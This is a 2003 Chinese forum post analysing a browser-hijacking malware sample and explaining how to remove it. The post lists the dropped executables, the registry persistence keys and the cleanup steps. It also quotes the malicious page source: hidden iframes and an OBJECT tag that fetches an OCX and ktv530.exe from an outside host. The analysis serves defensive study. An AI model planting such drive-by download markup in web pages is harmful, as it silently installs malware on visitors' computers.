与“流氓猪”作战(杀毒手记)

wang821002 2003-10-19 02:06:44
关于“流氓猪”网页恶意代码(或者也可叫病毒,最后才发现):
(以下论述只做业余研究之用,作者:wang821002)

a.表现:默认主页被修改成以下网站:
www.fun520.com,www.ktv530.com,www.ok530.com,www.7sou.com,and so on

b.危害:
修改ie,腾汛explorer等n种浏览器的主页设置,且用一般的注册表保护修改器很难预防和彻底清除。令人厌恶!!!

c.该病毒的组成:
该恶意代码共有5个文件组成,分别是:(以xp为例,2k,98类似,系统装在c盘)
c:\Documents and Settings\%账户名%\Local Settings\Temp\ktv530.exe
c:\windows\unicall.exe
c:\windows\system32\msater.exe
c:\windows\system32\restory.exe
c:\windows\system32\sysfiler.exe
只要有任一文件留存且其被执行时,其自生自动补充其余文件。

d.察看网页源代码的分析:

★☆Fun530★☆→www_Fun530_com 最流行的歌曲,最酷的动漫Flash尽在Fun530_Com永远提供给你最棒最全的歌曲欣赏^_^ 谢谢您.html:
(截取部分)
<BODY text=#000000 bgColor=#b6e06f leftMargin=0 topMargin=0><IFRAME
src="★☆Fun530★☆→www_Fun530_com 最流行的歌曲,最酷的动漫Flash尽在Fun530_Com永远提供给你最棒最全的歌曲欣赏^_^ 谢谢您.files/ktv530.htm"
width=0 height=0></IFRAME><IFRAME src="mhtml:http://www.mmqm.com/555/ktv530.mht"
width=0 height=0></IFRAME>

在此处ktv530.htm被调用!


ktv530.htm:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0035)http://www.mmqm.com/555/ktv530.html -->
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META content="MSHTML 6.00.2600.0" name=GENERATOR></HEAD>
<BODY>
<OBJECT codeBase=http://www.mmqm.com/555/WebDownLoadProj1.ocx#version=1,0,0,0
height=0 width=0 align=center
classid=clsid:36CB6B28-FC08-4373-8F54-1A02E3C15B7D><PARAM NAME="StrUrl" VALUE="http://www.mmqm.com/555/ktv530.exe"></OBJECT></BODY></HTML>

可见他的来源是http://www.mmqm.com/555/ktv530.exe,首先被down到机器上的是这个文件,并被执行,然后产生了其余的四个文件!这时你可以在任务管理器的进程中看到msater.exe被加载。


e.修改注册表中的键值:

HKEY_USERS\S-1-5-21-1202660629-688789844-1708537768-1003\Software\Microsoft\Internet Explorer\Main
名称:Start Page 类型:REG_SZ 数据:www.fun520.com或www.ok530.net或www.7sou.com
(修改主页)

HKEY_USERS\S-1-5-21-1202660629-688789844-1708537768-1003\Software\Microsoft\Windows NT\CurrentVersion\Windows
名称:load 类型:REG_SZ 数据:C:\WINDOWS\SYSTEM32\MSATER.EXE
(加载程序)

HKEY_USERS\S-1-5-21-1202660629-688789844-1708537768-1003\Software\Microsoft\Windows NT\CurrentVersion\Windows
名称:run 类型:REG_SZ 数据:C:\WINDOWS\SYSTEM32\UNICALL.EXE
(检查复制程序)

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
名称:restory 类型:REG_SZ 数据:c:\windows\system32\restory.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
名称:sysfiler 类型:REG_SZ 数据 c:\windows\system32\sysfiler.exe
(启动时自动加载)

(本人水平有限,只找到以上几个,若有其他发现不吝赐教)

f.对msater.exe(其他三个文件与其相同)的分析:

首先用language2000察看得:
版本信息:
文件名:msater.exe
注释:
版本:2.05
产品:windows
公司:流氓猪
编译器信息:
语言:C/C++
编译器:Visual C++
压缩/加密:
程序:ASPack
作者:Alexey Solodovnikov
URL:http://www.aspack.com/

尽然还打包了,有意思!!!!有趣的是当我用aspackdie解包后,我的金山毒霸2003病毒防火墙就向我发出了警告!信息如下:
文件:%path%\unpack.exe
感染:Modification.BackDoor.Generic.449 病毒
病毒介绍:
dos病毒或未知病毒。只能删除或隔离

我决定冒着危险跳过文件!!(从字面看相是个backdoor程序)
看来他并不是单纯的修改主页这么简单,大家可要看好自己的端口哦!
我想反编译这个程序来着,可惜水平有限,理解尚需时日。有那位大虾解释一下这个源程序,小弟不胜感激!
这还有一个问题就是病毒打包后就查不出来了?这个问题值得防病毒厂商好好研究研究!

g.关于这个病毒的防治:
清除:
删除上文提到的5个文件及所有相关的过期网页,删除所有提到的注册表里的键值,记得首要先把进程杀了(那5个文件加载的),在run中执行msconfig(xp,98使用),在启动项中去掉以上5个文件前面的钩(不一定全有),至此在小弟的机器上就没有再犯!

预防:
1.不打开不熟悉的网页,特别是网友发给你的,除非特别指明!!
2.注意病毒防火墙的病毒库的升级,这个还是有用的!
3.用一些注册表管理软件,其道一些防止恶意代码的作用。
4.在internet属性中的安全选项中,将安全级设到高。
......

以上是小弟在杀毒中的一点体会,就写下来工大家参考和一起研究!
...全文
32 2 打赏 收藏 转发到动态 举报
写回复
用AI写文章
2 条回复
切换为时间正序
请发表友善的回复…
发表回复
wang821002 2003-10-20
  • 打赏
  • 举报
回复
不用客气,大家可以把自己的一些所见所遇分享出来,一起讨论研究!共同进步!
frankMasson 2003-10-19
  • 打赏
  • 举报
回复
谢谢啊,我最近也被这么一个类似的东西搞得晕头转向,这此文做指导,当可根除之.

9,505

社区成员

发帖
与我相关
我的任务
社区描述
Windows专区 安全技术/病毒
社区管理员
  • 安全技术/病毒社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧